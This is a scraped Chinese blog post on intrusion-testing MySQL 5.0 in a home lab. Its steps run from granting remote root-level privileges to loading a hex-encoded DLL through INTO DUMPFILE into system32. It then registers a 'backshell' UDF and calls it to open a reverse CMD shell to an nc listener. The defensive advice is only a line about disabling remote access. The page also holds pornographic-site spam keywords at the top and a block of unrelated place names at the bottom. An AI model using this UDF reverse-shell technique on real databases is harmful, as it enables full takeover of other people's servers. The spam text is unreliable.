最新国产好看的视频,伊人天堂AV在线,国产Aaaaaa视频,蜜臀视频在线观看一区,人妻av色图,密臀久久久精品影片,青青视频免费观看毛片,久草在线观看视,国产三级精品色情在线

mysql5.0入侵測試以及防范方法分享

 更新時間:2013年12月12日 09:33:03   作者:  
這篇文章主要介紹了mysql5入侵測試以及防范方法,大家參考使用吧

在做了之前的SQL SERVER之后,便很想嘗試一下MYSQL的入侵測試已經(jīng)防范,與大家一起分享。
總的來說,我一直在用的是MYSQL,對MYSQL比較熟悉,相比較而言,感覺MYSQL更安全,這只是我自己胡亂猜想的,希望不要引起什么爭論神馬的。。。一本饅頭引發(fā)的血案。。。

正題之一

物理機(jī):Win7
虛擬機(jī):XP

給予mysql遠(yuǎn)程權(quán)限:

復(fù)制代碼 代碼如下:

grant all privileges on *.* to 數(shù)據(jù)庫賬號@給予權(quán)限的IP identified by '數(shù)據(jù)庫密碼';
flush privileges;


給物理機(jī)遠(yuǎn)程權(quán)限:

物理機(jī)成功連接上:

執(zhí)行侵入測試前(有圖有真相):

執(zhí)行侵入測試后(有圖有真相):

重啟前(有圖有真相):

重啟后(有圖有真相):

正題之二:

遠(yuǎn)程登錄之后寫入代碼,代碼在yyd.txt當(dāng)中,然后在MySql中寫入文件:

Win7 打另外一個cmd,本地端口映射:nc -vv -l -p 端口號

虛擬機(jī)上:執(zhí)行映射:select backshell("物理機(jī)IP",端口號);

這便執(zhí)行了3306端口反彈CMD

(沒圖了。。。用到了一個nc軟件執(zhí)行的映射)

yyd.txt大概內(nèi)容:

復(fù)制代碼 代碼如下:

et @a=concat('',
0x4d5a4b45524e454c33322e444c4c00004c6f61644c696272617279410000000047657450726f63416464726573730000557061636b42794477696e6740000000504500004c010200000000000000000000000000e0000e210b0100360090000000100100000000003d9502000010000000a00000000000100010000000020000040000000000000004000000000000000010030000020000000000000200000000001000001000000000100000100000000000001000000009980200dd020000f19702001400000000c0010090000000000000000000000000000000000000000000000000000000000.........只是部分代碼...............0736875745f6465696e697400736875745f696e697400);
create table yyd(data LONGBLOB);
insert into yyd values("");updateyyd set data = @a;
select data from yyd into DUMPFILE 'c:\\windows\\system32\\yyd.dll';
CREATE FUNCTION backshell RETURNS STRING SONAME 'yyd.dll';


正題之三:

防范

 

感覺有點亂,主要是分享了兩種方法入侵,但是防范那部分應(yīng)該是XP上的MySql服務(wù)關(guān)閉,但是早XP上做了好多測試,左后XP被我弄掛掉了。。。。好丟臉,只好把Win7上的MySql服務(wù)拿出來了。

覺得主要還是遠(yuǎn)程連接的問題,“如果MySql不開啟遠(yuǎn)程連接的話我們還是朋友”,開玩笑,如果MySql不開啟遠(yuǎn)程連接的話入侵幾率會小的很多。

相關(guān)文章

  • MySQL系列之開篇 MySQL關(guān)系型數(shù)據(jù)庫基礎(chǔ)概念

    MySQL系列之開篇 MySQL關(guān)系型數(shù)據(jù)庫基礎(chǔ)概念

    數(shù)據(jù)庫是指長期儲存在計算機(jī)中的有組織的、可共享的數(shù)據(jù)集合,數(shù)據(jù)具有三大基本特點,永久存儲,有組織,可共享,是數(shù)據(jù)庫系統(tǒng)的核心,本文給大家分享MySQL關(guān)系型數(shù)據(jù)庫基礎(chǔ)概念,需要的朋友參考下吧
    2021-07-07
  • MySQL: mysql is not running but lock exists 的解決方法

    MySQL: mysql is not running but lock exists 的解決方法

    下面可以參考下面的方法步驟解決。最后查到一個網(wǎng)友說可能和log文件有關(guān),于是將log文件給移除了,再重啟MySQL終于OK了
    2009-06-06
  • MySQL查看所有用戶的實現(xiàn)

    MySQL查看所有用戶的實現(xiàn)

    本文主要介紹了MySQL查看所有用戶的實現(xiàn),文中通過示例代碼介紹的非常詳細(xì),對大家的學(xué)習(xí)或者工作具有一定的參考學(xué)習(xí)價值,需要的朋友們下面隨著小編來一起學(xué)習(xí)學(xué)習(xí)吧
    2023-03-03
  • MySQL中文漢字轉(zhuǎn)拼音的自定義函數(shù)和使用實例(首字的首字母)

    MySQL中文漢字轉(zhuǎn)拼音的自定義函數(shù)和使用實例(首字的首字母)

    這篇文章主要介紹了MySQL中文漢字轉(zhuǎn)拼音的自定義函數(shù)和使用實例,需要的朋友可以參考下
    2014-06-06
  • MySQL簡化輸入小技巧

    MySQL簡化輸入小技巧

    在這里我將介紹兩個使用MySQL數(shù)據(jù)庫時候簡化輸入的小技巧。
    2011-09-09
  • mysql關(guān)于or的索引的問題及解決

    mysql關(guān)于or的索引的問題及解決

    這篇文章主要介紹了mysql關(guān)于or的索引的問題及解決方案,具有很好的參考價值,希望對大家有所幫助,如有錯誤或未考慮完全的地方,望不吝賜教
    2023-08-08
  • MySql之授權(quán)用戶權(quán)限如何設(shè)置

    MySql之授權(quán)用戶權(quán)限如何設(shè)置

    這篇文章主要介紹了MySql之授權(quán)用戶權(quán)限如何設(shè)置問題,具有很好的參考價值,希望對大家有所幫助。如有錯誤或未考慮完全的地方,望不吝賜教
    2023-05-05
  • MySQL中的?DQL?聚合函數(shù)詳解

    MySQL中的?DQL?聚合函數(shù)詳解

    SQL聚合函數(shù)是一組函數(shù),用于計算并返回數(shù)據(jù)集的單個值,這些函數(shù)通常用于在SELECT語句中匯總數(shù)據(jù),本文給大家介紹MySQL中的DQL聚合函數(shù),感興趣的朋友跟隨小編一起看看吧
    2023-07-07
  • mysql獲取當(dāng)前日期年月的兩種實現(xiàn)方式

    mysql獲取當(dāng)前日期年月的兩種實現(xiàn)方式

    這篇文章主要介紹了mysql獲取當(dāng)前日期年月的兩種實現(xiàn)方式,具有很好的參考價值,希望對大家有所幫助。如有錯誤或未考慮完全的地方,望不吝賜教
    2023-07-07
  • mysql去除重復(fù)數(shù)據(jù)只保留一條數(shù)據(jù)實例

    mysql去除重復(fù)數(shù)據(jù)只保留一條數(shù)據(jù)實例

    這篇文章主要給大家介紹了關(guān)于mysql去除重復(fù)數(shù)據(jù)只保留一條數(shù)據(jù)的相關(guān)資料,在使用MySQL時,有時需要查詢出某個字段不重復(fù)的記錄,文中通過示例代碼介紹的非常詳細(xì),需要的朋友可以參考下
    2023-08-08

最新評論

石柱| 林芝县| 华容县| 吉木萨尔县| 海原县| 清涧县| 广安市| 龙陵县| 蒙山县| 扎赉特旗| 滨州市| 海淀区| 宁强县| 岑溪市| 宝应县| 鲁甸县| 林州市| 巍山| 饶河县| 石棉县| 镇远县| 天祝| 瓮安县| 彰武县| 祁阳县| 西畴县| 台中市| 普格县| 马尔康县| 金坛市| 庄河市| 拉萨市| 屯门区| 固始县| 应用必备| 沙坪坝区| 休宁县| 修文县| 高邑县| 天门市| 那坡县|